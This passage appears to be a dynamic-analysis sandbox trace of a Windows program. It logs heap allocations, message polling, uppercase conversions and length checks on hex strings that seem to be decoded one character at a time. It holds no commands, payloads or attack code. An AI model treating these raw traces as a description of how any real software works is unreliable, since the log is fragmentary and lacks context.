(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0133.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0133.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1108 [0133.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9108 | out: hHeap=0x25c0000) returned 1 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90a8 | out: hHeap=0x25c0000) returned 1 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.405] lstrlenW (lpString="6C") returned 2 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10e8 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.406] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.406] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10e8 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10f8 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9060 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90a8 [0133.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90f0 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1118 [0133.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9108 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90a8 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.407] lstrlenW (lpString="33") returned 2 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9108 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9060 [0133.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10f8 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.407] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.407] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10f8 [0133.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9048 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9060 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10e8 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1118 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9108 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90f0 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9078 [0133.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90d8 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90c0 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1108 [0133.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9090 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1108 [0133.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a90a8 [0133.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9078 | out: hHeap=0x25c0000) returned 1 [0133.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0133.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0133.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0133.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9108 | out: hHeap=0x25c0000) returned 1 [0133.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.409] lstrlenW (lpString="32") returned 2 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90a8 | out: hHeap=0x25c0000) returned 1 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10e8 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x2415e78 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.409] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.409] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10e8 [0133.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9018 [0133.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9030 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90a8 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9108 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.410] lstrlenW (lpString="2E") returned 2 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0133.410] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.410] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9060 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90d8 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90c0 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9108 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90f0 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1118 | out: hHeap=0x25c0000) returned 1 [0133.411] lstrlenW (lpString="64") returned 2 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a90a8 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1108 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9090 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9030 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9018 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10e8 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9048 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8fb8 | out: hHeap=0x25c0000) returned 1 [0133.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10f8 | out: hHeap=0x25c0000) returned 1 [0133.411] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.411] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.411] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.411] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.411] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.411] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.411] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.412] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: lpMsg=0x8bf230, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf230) returned 0 [0133.413] PeekMessageW (in: 